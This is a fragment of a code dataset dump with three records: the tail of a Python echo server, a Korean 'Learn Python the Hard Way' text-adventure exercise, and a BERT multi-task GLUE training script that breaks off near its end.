(client_socket, addr))\n\nserver_socket.close()","sub_path":"python-temp-echo-server/echo-server.py","file_name":"echo-server.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"132359250","text":"# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\ndef gold_room():\n \"\"\"it requires you to input any number containing 0 or 1 and you should enter less than 50 in order to win the game\"\"\"\n print(\"황금으로 가득 찬 방입니다. 얼마나 가져갈까요?\")\n \n try: \n next = int(input(\">\")) \n if how_much < 50:\n print(\"좋아, 욕심부리지 않는군요. 당신이 이겼습니다!\")\n exit(0)\n else:\n dead(\"욕심쟁이 얼간이 같으니!\")\n \n except ValueError:\n dead(\"인간이여, 숫자 쓰는 법부터 배우세요.\")\n # quit the function with the message? yes it does.\n\n#def gold_room():\n# \"\"\"it requires you to input any number containing 0 or 1 and you #should enter less than 50 in order to win the game\"\"\"\n# print(\"황금으로 가득 찬 방입니다. 얼마나 가져갈까요?\")\n \n# next = input(\">\")\n# if \"0\",\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"1\" in next :\n# how_much = int(next)\n# else:\n# dead(\"인간이여, 숫자 쓰는 법부터 배우세요.\")\n# # quit the function with the message? yes it does.\n \n# if how_much < 50:\n# print(\"좋아, 욕심부리지 않는군요. 당신이 이겼습니다!\")\n# exit(0)\n# else:\n# dead(\"욕심쟁이 얼간이 같으니!\")\n \ndef bear_room():\n print(\"Here is a bear\")\n print(\"with large amount of honey\")\n print(\"There is another fat bear in front of the door\")\n print(\"How could you move the bears?\")\n bear_moved = False\n \n while True:\n next = input(\"(꿀 뺏기/ 곰 놀리기/ 문 열기)>\")\n \n if next == \"꿀 뺏기\":\n dead(\"The bear look at you and chop your cheek badly\")\n elif next == \"곰 놀리기\" and not bear_moved:\n print(\"The bear get away from the door. You may leave safely\")\n bear_moved = True\n elif next == \"곰 놀리기\" and bear_moved:\n dead(\"You just exasperated the bear and it ate your leg away\")\n # Executed when you keep \"곰 놀리기\" twice.\n elif next == \"문 열기\" and bear_moved:\n gold_room()\n else:\n print(\"무슨 말인지 모르겠네요. 선택지 중에 고르세요\")\n \ndef cthulhu_room():\n print(\"여기에서는 대악마 크툴루를 봅니다.\")\n print(\"He, it, anyway gazes at you and you are getting crazy\")\n print(\"Run away, or I would tear your head apart\")\n \n next = input(\"(달아나기/ 먹기)>\")\n \n if \"달아나기\" in next:\n start()\n elif \"먹기\" in next:\n dead(\"음, 맛이 좋군요!\")\n else:\n cthulhu_room()\n \n\ndef dead(why):\n \"\"\"It prints out the given message and turn off the game\"\"\"\n print(why, \"ㅋ\")\n exit(0)\n# Shouldn't it be defined previously, preceding at least 'gold room'?\n\n\ndef start():\n print(\"You're in dark, dark room.\")\n print(\"At right side and left side are doors\")\n print(\"Which one would you select?\")\n \n next = input(\"(왼쪽/ 오른쪽)>\")\n \n if next == \"왼쪽\":\n bear_room()\n elif next == \"오른쪽\":\n cthulhu_room()\n else:\n dead(\"문 주위에서 맴돌기만하다 굶어 죽었습니다.\")\n \n#start()\ngold_room()\n\n# exit()프로그램 강재종료/ 인자에 따라서 오류여부/종류 특정가능","sub_path":"python/LearnPythonTheHardWay/129_ex35_usoufo12.py","file_name":"129_ex35_usoufo12.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"380441962","text":"import transformers\r\nfrom transformers import BertTokenizer, BertModel, AdamW, get_linear_schedule_with_warmup\r\nimport random\r\nimport torch\r\nfrom torch.nn import CrossEntropyLoss\r\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler, WeightedRandomSampler\r\nimport time\r\nimport datetime\r\nimport numpy as np\r\nfrom PointerModel import PointerBert\r\nfrom preprocess_glue import *\r\nimport os\r\nfrom nlp import load_dataset\r\nimport tensorflow as tf\r\nfrom DynamicDataLoader import InstanceSampler\r\n\r\nflags = tf.compat.v1.app.flags\r\nFLAGS = flags.FLAGS\r\nflags.DEFINE_float('learning_rate', 3e-5, 'Initial learning rate.')\r\nflags.DEFINE_float('epsilon', 1e-8, 'epsilon.')\r\nflags.DEFINE_integer('num_epochs', 5, 'Number of epochs when training.')\r\nflags.DEFINE_integer('batch_size', 32, 'Size of each batch. Default is 32.')\r\nflags.DEFINE_boolean('dynamic_sampling', False, 'Use dynamic sampling?')\r\n\r\nNEW_SPEC_TOKENS = ['[ACCEPTABLE]', '[UNACCEPTABLE]', \r\n '[POSITIVE]', '[NEGATIVE]', \r\n '[PARAPHRASE]', '[NOT_PARAPHRASE]', \r\n '[SIMILAR]', '[NOT_SIMILAR]',\r\n '[ENTAILMENT]', '[NEUTRAL]', '[CONTRADICTION]',\r\n '[ANSWERABLE]', '[NOT_ANSWERABLE]',\r\n '[REFERENT]', '[NOT_REFERENT]']\r\n\r\nsingle_accuracy = {'cola' : 0.831,\r\n 'sst2' : 0.924,\r\n 'mrpc' : 0.869,\r\n 'qqp' : 0.911,\r\n 'mnli' : 0.839,\r\n 'rte' : 0.799,\r\n 'qnli' : 0.911,\r\n 'wnli' : 0.565\r\n }\r\n\r\n# Function to calculate the accuracy of our predictions vs labels\r\ndef flat_accuracy(preds, labels):\r\n pred_flat = np.argmax(preds, axis=1).flatten()\r\n labels_flat = labels.flatten()\r\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\r\n\r\n#\r\ndef format_time(elapsed):\r\n '''\r\n Takes a time in seconds and returns a string hh:mm:ss\r\n '''\r\n # Round to the nearest second.\r\n elapsed_rounded = int(round((elapsed)))\r\n \r\n # Format as hh:mm:ss\r\n return str(datetime.timedelta(seconds=elapsed_rounded))\r\n\r\n# TODO : dddd\r\n# =======================================================\r\n# Get positive weights from accuracies(or other metrics) \r\n# by getting the differentials of those with those of\r\n# single-task models. Add some positive number \r\n# if any of the scores are negative to make them positive.\r\n# ========================================================\r\ndef get_scores_from_acc(cola=None, sst2=None, mrpc=None, qqp=None, mnli=None, rte=None, qnli=None, wnli=None):\r\n cola_score = single_accuracy['cola'] - cola + 0.2\r\n sst2_score = single_accuracy['sst2'] - sst2 + 0.2\r\n mrpc_score = single_accuracy['mrpc'] - mrpc + 0.2\r\n qqp_score = single_accuracy['qqp'] - qqp + 0.2\r\n mnli_score = single_accuracy['mnli'] - mnli + 0.2\r\n rte_score = single_accuracy['rte'] - rte + 0.2\r\n qnli_score = single_accuracy['qnli'] - qnli + 0.2\r\n wnli_score = single_accuracy['wnli'] - wnli + 0.2 \r\n return cola_score, sst2_score, mrpc_score, qqp_score, mnli_score, rte_score, qnli_score, wnli_score\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if torch.cuda.is_available(): \r\n device = torch.device(\"cuda\")\r\n print('There are %d GPU(s) available.' % torch.cuda.device_count())\r\n print('We will use the GPU:', torch.cuda.get_device_name(0))\r\n else:\r\n print('No GPU available, using the CPU instead.')\r\n device = torch.device(\"cpu\")\r\n\r\n # ========================================================\r\n # Call appropriate tokenizer of the Bert model.\r\n # If there is a saved version, load it.\r\n # If not, load a new pretrained BertTokenizer with \r\n # special tokens addded. Then save it.\r\n # ========================================================\r\n if os.path.isdir('./tokenizer/custom-tok'): # Check if we already have a customzied tokenizer.\r\n tokenizer = BertTokenizer.from_pretrained('custom-tok') # If we do, load it. \r\n else:\r\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, additional_special_tokens=NEW_SPEC_TOKENS)\r\n tokenizer.save_pretrained('./tokenizer/custom_tok')\r\n\r\n # =========================================================\r\n # Call Pointer Bert model that uses Bert as its embedding\r\n # and has an extra dot-producting layer that \r\n # finds the right answer among the added task tokens.\r\n # =========================================================\r\n\r\n bert = BertModel.from_pretrained('bert-base-uncased')\r\n bert.resize_token_embeddings(len(tokenizer))\r\n model = PointerBert(bert)\r\n\r\n if torch.cuda.is_available():\r\n model.cuda()\r\n\r\n batch_size = FLAGS.batch_size\r\n\r\n cola_train_dataset, cola_val_dataset = get_small_train_val_datasets('cola')\r\n sst2_train_dataset, sst2_val_dataset = get_small_train_val_datasets('sst2')\r\n mrpc_train_dataset, mrpc_val_dataset = get_small_train_val_datasets('mrpc')\r\n qqp_train_dataset, qqp_val_dataset = get_small_train_val_datasets('qqp')\r\n mnli_train_dataset, mnli_val_dataset = get_small_train_val_datasets('mnli')\r\n rte_train_dataset, rte_val_dataset = get_small_train_val_datasets('rte')\r\n qnli_train_dataset, qnli_val_dataset = get_small_train_val_datasets('qnli')\r\n wnli_train_dataset, wnli_val_dataset = get_small_train_val_datasets('wnli')\r\n\r\n cola_train_dataset = cola_train_dataset.map(make_encoder('cola', tokenizer))\r\n cola_val_dataset = cola_val_dataset.map(make_encoder('cola', tokenizer))\r\n sst2_train_dataset = sst2_train_dataset.map(make_encoder('sst2', tokenizer))\r\n sst2_val_dataset = sst2_val_dataset.map(make_encoder('sst2', tokenizer))\r\n mrpc_train_dataset = mrpc_train_dataset.map(make_encoder('mrpc', tokenizer))\r\n mrpc_val_dataset = mrpc_val_dataset.map(make_encoder('mrpc', tokenizer))\r\n qqp_train_dataset = qqp_train_dataset.map(make_encoder('qqp', tokenizer))\r\n qqp_val_dataset = qqp_val_dataset.map(make_encoder('qqp', tokenizer))\r\n mnli_train_dataset = mnli_train_dataset.map(make_encoder('mnli', tokenizer))\r\n mnli_val_dataset = mnli_val_dataset.map(make_encoder('mnli', tokenizer))\r\n rte_train_dataset = rte_train_dataset.map(make_encoder('rte', tokenizer))\r\n rte_val_dataset = rte_val_dataset.map(make_encoder('rte', tokenizer))\r\n qnli_train_dataset = qnli_train_dataset.map(make_encoder('qnli', tokenizer))\r\n qnli_val_dataset = qnli_val_dataset.map(make_encoder('qnli', tokenizer))\r\n wnli_train_dataset = wnli_train_dataset.map(make_encoder('wnli', tokenizer))\r\n wnli_val_dataset = wnli_val_dataset.map(make_encoder('wnli', tokenizer))\r\n \r\n cola_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n sst2_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n mrpc_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n qqp_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n mnli_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n rte_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n qnli_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n wnli_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n \r\n cola_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n sst2_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n mrpc_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n qqp_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n mnli_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n rte_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n qnli_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n wnli_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n\r\n\r\n total_size = len(cola_train_dataset) + len(sst2_train_dataset) + len(mrpc_train_dataset) + len(qqp_train_dataset) + len(mnli_train_dataset) + len(rte_train_dataset) + len(qnli_train_dataset) + len(wnli_train_dataset)\r\n sample_size = total_size // 10\r\n\r\n inst_sampler = InstanceSampler(sample_size, cola_train_dataset, sst2_train_dataset, mrpc_train_dataset, qqp_train_dataset, mnli_train_dataset, rte_train_dataset, qnli_train_dataset, wnli_train_dataset, dynamic=True)\r\n \r\n train_dataset = inst_sampler.get_sample()\r\n print(\"total size of training data is\", total_size)\r\n \r\n train_dataloader = DataLoader(\r\n train_dataset, \r\n sampler = RandomSampler(train_dataset),\r\n batch_size = batch_size \r\n )\r\n\r\n # =========================================================\r\n # We make one validation dataloader for each dataset.\r\n # Validation accuracy of each dataset is used to set \r\n # the weights of dynamic sampling.\r\n # =========================================================\r\n cola_val_dataloader = DataLoader(\r\n cola_val_dataset,\r\n sampler = SequentialSampler(cola_val_dataset), \r\n batch_size = batch_size \r\n )\r\n sst2_val_dataloader = DataLoader(\r\n sst2_val_dataset,\r\n sampler = SequentialSampler(sst2_val_dataset), \r\n batch_size = batch_size \r\n )\r\n mrpc_val_dataloader = DataLoader(\r\n mrpc_val_dataset,\r\n sampler = SequentialSampler(mrpc_val_dataset), \r\n batch_size = batch_size \r\n )\r\n qqp_val_dataloader = DataLoader(\r\n qqp_val_dataset,\r\n sampler = SequentialSampler(qqp_val_dataset), \r\n batch_size = batch_size \r\n )\r\n mnli_val_dataloader = DataLoader(\r\n mnli_val_dataset,\r\n sampler = SequentialSampler(mnli_val_dataset), \r\n batch_size = batch_size \r\n )\r\n rte_val_dataloader = DataLoader(\r\n rte_val_dataset,\r\n sampler = SequentialSampler(rte_val_dataset), \r\n batch_size = batch_size \r\n )\r\n qnli_val_dataloader = DataLoader(\r\n qnli_val_dataset,\r\n sampler = SequentialSampler(qnli_val_dataset), \r\n batch_size = batch_size \r\n )\r\n wnli_val_dataloader = DataLoader(\r\n wnli_val_dataset,\r\n sampler = SequentialSampler(wnli_val_dataset), \r\n batch_size = batch_size \r\n )\r\n\r\n # ====================================================\r\n # Set up optimizer and scheduler for training.\r\n # ====================================================\r\n optimizer = AdamW(model.parameters(),\r\n lr = FLAGS.learning_rate, \r\n eps = FLAGS.epsilon\r\n )\r\n\r\n epochs = FLAGS.num_epochs\r\n total_steps = len(train_dataloader) * epochs\r\n scheduler = get_linear_schedule_with_warmup(optimizer, \r\n num_warmup_steps = 0,\r\n num_training_steps = total_steps)\r\n \r\n training_stats = []\r\n total_t0 = time.time()\r\n for epoch_i in range(0, epochs):\r\n print(\"size of instance sample is\", len(train_dataset))\r\n \r\n # ========================================\r\n # Training\r\n # ========================================\r\n \r\n # Perform one full pass over the training set.\r\n\r\n print(\"\")\r\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\r\n print('Training...')\r\n\r\n # Measure how long the training epoch takes.\r\n t0 = time.time()\r\n\r\n # Reset the total loss for this epoch.\r\n total_train_loss = 0\r\n\r\n total_train_accuracy = 0\r\n\r\n model.train()\r\n\r\n # For each batch of training data...\r\n for step, batch in enumerate(train_dataloader):\r\n # Progress update every 400 batches.\r\n if step % 400 == 0 and not step == 0:\r\n # Calculate elapsed time in minutes.\r\n elapsed = format_time(time.time() - t0)\r\n \r\n # Report progress.\r\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))\r\n\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n\r\n model.zero_grad() \r\n\r\n loss, logits = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask, \r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n\r\n total_train_accuracy += flat_accuracy(logits, label_ids)\r\n total_train_loss += loss.item()\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\r\n\r\n optimizer.step()\r\n scheduler.step()\r\n\r\n # Calculate the average loss over all of the batches.\r\n avg_train_loss = total_train_loss / len(train_dataloader) \r\n\r\n avg_train_accuracy = total_train_accuracy / len(train_dataloader) \r\n \r\n # Measure how long this epoch took.\r\n training_time = format_time(time.time() - t0)\r\n\r\n print(\"\")\r\n print(\" Average training accuracy: {0:.2f}\".format(avg_train_accuracy))\r\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\r\n print(\" Training epcoh took: {:}\".format(training_time))\r\n \r\n # ========================================\r\n # Validation\r\n # ========================================\r\n # After the completion of each training epoch, measure our performance on\r\n # our validation set.\r\n\r\n print(\"\")\r\n print(\"Running Validations...\")\r\n\r\n t0 = time.time()\r\n\r\n # Put the model in evaluation mode--the dropout layers behave differently\r\n # during evaluation.\r\n model.eval()\r\n\r\n # ========================================\r\n # Cola Validation\r\n # ========================================\r\n\r\n total_cola_eval_accuracy = 0\r\n total_cola_eval_loss = 0\r\n\r\n for batch in cola_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_cola_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_cola_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_cola_val_accuracy = total_cola_eval_accuracy / len(cola_val_dataloader)\r\n print(\" Cola Accuracy: {0:.2f}\".format(avg_cola_val_accuracy))\r\n\r\n avg_cola_val_loss = total_cola_eval_loss / len(cola_val_dataloader)\r\n print(\" Cola Validation Loss: {0:.2f}\".format(avg_cola_val_loss))\r\n\r\n # ========================================\r\n # SSt-2 Validation\r\n # ========================================\r\n\r\n total_sst2_eval_accuracy = 0\r\n total_sst2_eval_loss = 0\r\n\r\n for batch in sst2_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_sst2_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_sst2_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_sst2_val_accuracy = total_sst2_eval_accuracy / len(sst2_val_dataloader)\r\n print(\" SST-2 Accuracy: {0:.2f}\".format(avg_sst2_val_accuracy))\r\n\r\n avg_sst2_val_loss = total_sst2_eval_loss / len(sst2_val_dataloader)\r\n print(\" SST-2 Validation Loss: {0:.2f}\".format(avg_sst2_val_loss))\r\n\r\n # ========================================\r\n # MRPC Validation\r\n # ========================================\r\n\r\n total_mrpc_eval_accuracy = 0\r\n total_mrpc_eval_loss = 0\r\n\r\n for batch in mrpc_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_mrpc_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_mrpc_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_mrpc_val_accuracy = total_mrpc_eval_accuracy / len(mrpc_val_dataloader)\r\n print(\" MRPC Accuracy: {0:.2f}\".format(avg_mrpc_val_accuracy))\r\n\r\n avg_mrpc_val_loss = total_mrpc_eval_loss / len(mrpc_val_dataloader)\r\n print(\" MRPC Validation Loss: {0:.2f}\".format(avg_mrpc_val_loss))\r\n\r\n # ========================================\r\n # QQP Validation\r\n # ========================================\r\n\r\n total_qqp_eval_accuracy = 0\r\n total_qqp_eval_loss = 0\r\n\r\n for batch in qqp_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_qqp_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_qqp_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_qqp_val_accuracy = total_qqp_eval_accuracy / len(qqp_val_dataloader)\r\n print(\" QQP Accuracy: {0:.2f}\".format(avg_qqp_val_accuracy))\r\n\r\n avg_qqp_val_loss = total_qqp_eval_loss / len(qqp_val_dataloader)\r\n print(\" QQP Validation Loss: {0:.2f}\".format(avg_qqp_val_loss))\r\n\r\n # ========================================\r\n # MNLI Validation\r\n # ========================================\r\n\r\n total_mnli_eval_accuracy = 0\r\n total_mnli_eval_loss = 0\r\n\r\n for batch in mnli_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_mnli_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_mnli_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_mnli_val_accuracy = total_mnli_eval_accuracy / len(mnli_val_dataloader)\r\n print(\" MNLI Accuracy: {0:.2f}\".format(avg_mnli_val_accuracy))\r\n\r\n avg_mnli_val_loss = total_mnli_eval_loss / len(mnli_val_dataloader)\r\n print(\" MNLI Validation Loss: {0:.2f}\".format(avg_mnli_val_loss))\r\n\r\n # ========================================\r\n # RTE Validation\r\n # ========================================\r\n\r\n total_rte_eval_accuracy = 0\r\n total_rte_eval_loss = 0\r\n\r\n for batch in rte_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_rte_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_rte_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_rte_val_accuracy = total_rte_eval_accuracy / len(rte_val_dataloader)\r\n print(\" RTE Accuracy: {0:.2f}\".format(avg_rte_val_accuracy))\r\n\r\n avg_rte_val_loss = total_rte_eval_loss / len(rte_val_dataloader)\r\n print(\" RTE Validation Loss: {0:.2f}\".format(avg_rte_val_loss))\r\n\r\n # ========================================\r\n # QNLI Validation\r\n # ========================================\r\n\r\n total_qnli_eval_accuracy = 0\r\n total_qnli_eval_loss = 0\r\n\r\n for batch in qnli_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_qnli_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_qnli_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_qnli_val_accuracy = total_qnli_eval_accuracy / len(qnli_val_dataloader)\r\n print(\" QNLI Accuracy: {0:.2f}\".format(avg_qnli_val_accuracy))\r\n\r\n avg_qnli_val_loss = total_qnli_eval_loss / len(qnli_val_dataloader)\r\n print(\" QNLI Validation Loss: {0:.2f}\".format(avg_qnli_val_loss))\r\n\r\n # ========================================\r\n # WNLI Validation\r\n # ========================================\r\n\r\n total_wnli_eval_accuracy = 0\r\n total_wnli_eval_loss = 0\r\n\r\n for batch in wnli_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_wnli_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_wnli_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_wnli_val_accuracy = total_wnli_eval_accuracy / len(wnli_val_dataloader)\r\n print(\" WNLI Accuracy: {0:.2f}\".format(avg_wnli_val_accuracy))\r\n\r\n avg_wnli_val_loss = total_wnli_eval_loss / len(wnli_val_dataloader)\r\n print(\" WNLI Validation Loss: {0:.2f}\".format(avg_wnli_val_loss))\r\n\r\n\r\n avg_tot_val_accuracy = (avg_cola_val_accuracy + avg_sst2_val_accuracy + avg_mrpc_val_accuracy + avg_qqp_val_accuracy\r\n + avg_mnli_val_accuracy + avg_rte_val_accuracy + avg_qnli_val_accuracy + avg_wnli_val_accuracy) / 8\r\n\r\n avg_tot_val_loss = (avg_cola_val_loss + avg_sst2_val_loss + avg_mrpc_val_loss + avg_qqp_val_loss \r\n + avg_mnli_val_loss + avg_rte_val_loss + avg_qnli_val_loss + avg_wnli_val_loss) / 8\r\n\r\n # Measure how long the validation run took.\r\n validation_time = format_time(time.time() - t0)\r\n print(\" Total Validation took: {:}\".format(validation_time))\r\n\r\n\r\n # Record all statistics from this epoch.\r\n training_stats.append(\r\n {\r\n 'epoch': epoch_i + 1,\r\n 'Training Accur.': avg_train_accuracy,\r\n 'Training Loss': avg_train_loss,\r\n 'COLA Valid. Loss': avg_cola_val_loss,\r\n 'COLA Valid. Accur.': avg_cola_val_accuracy,\r\n 'SST-2 Valid. Loss': avg_sst2_val_loss,\r\n 'SST-2 Valid. Accur.': avg_sst2_val_accuracy,\r\n 'MRPC Valid. Loss': avg_mrpc_val_loss,\r\n 'MRPC Valid. Accur.': avg_mrpc_val_accuracy,\r\n 'QQP Valid. Loss': avg_qqp_val_loss,\r\n 'QQP Valid. Accur.': avg_qqp_val_accuracy,\r\n 'MNLI Valid. Loss': avg_mnli_val_loss,\r\n 'MNLI Valid. Accur.': avg_mnli_val_accuracy,\r\n 'RTE Valid. Loss': avg_rte_val_loss,\r\n 'RTE Valid. Accur.': avg_rte_val_accuracy,\r\n 'QNLI Valid. Loss': avg_qnli_val_loss,\r\n 'QNLI Valid. Accur.': avg_qnli_val_accuracy,\r\n 'WNLI Valid. Loss': avg_wnli_val_loss,\r\n 'WNLI Valid. Accur.': avg_wnli_val_accuracy,\r\n 'Avg Total Valid. Accur.' : avg_tot_val_accuracy,\r\n 'Avg Total Valid. Loss' : avg_tot_val_loss,\r\n 'Training Time': training_time,\r\n 'Validation Time': validation_time\r\n }\r\n )\r\n\r\n if FLAGS.dynamic_sampling:\r\n print(\"Updating weights for dynamic sampling...\")\r\n cola_score, sst2_score, mrpc_score, qqp_score, mnli_score, rte_score, qnli_score, wnli_score = get_scores_from_acc(avg_cola_val_accuracy, avg_sst2_val_accuracy, \r\n avg_mrpc_val_accuracy, avg_qqp_val_accuracy, avg_mnli_val_accuracy, avg_rte_val_accuracy, avg_qnli_val_accuracy, avg_wnli_val_accuracy)\r\n inst_sampler.update_weights(cola_score, sst2_score, mrpc_score, qqp_score, mnli_score, rte_score, qnli_score, wnli_score)\r\n train_dataset = inst_sampler.get_sample()\r\n train_dataloader = DataLoader(\r\n train_dataset, \r\n sampler = RandomSampler(train_dataset),\r\n batch_size = batch_size \r\n )\r\n\r\n print(\"\")\r\n print(\"Training complete!\")\r\n\r\n print(\"Total training took {:} 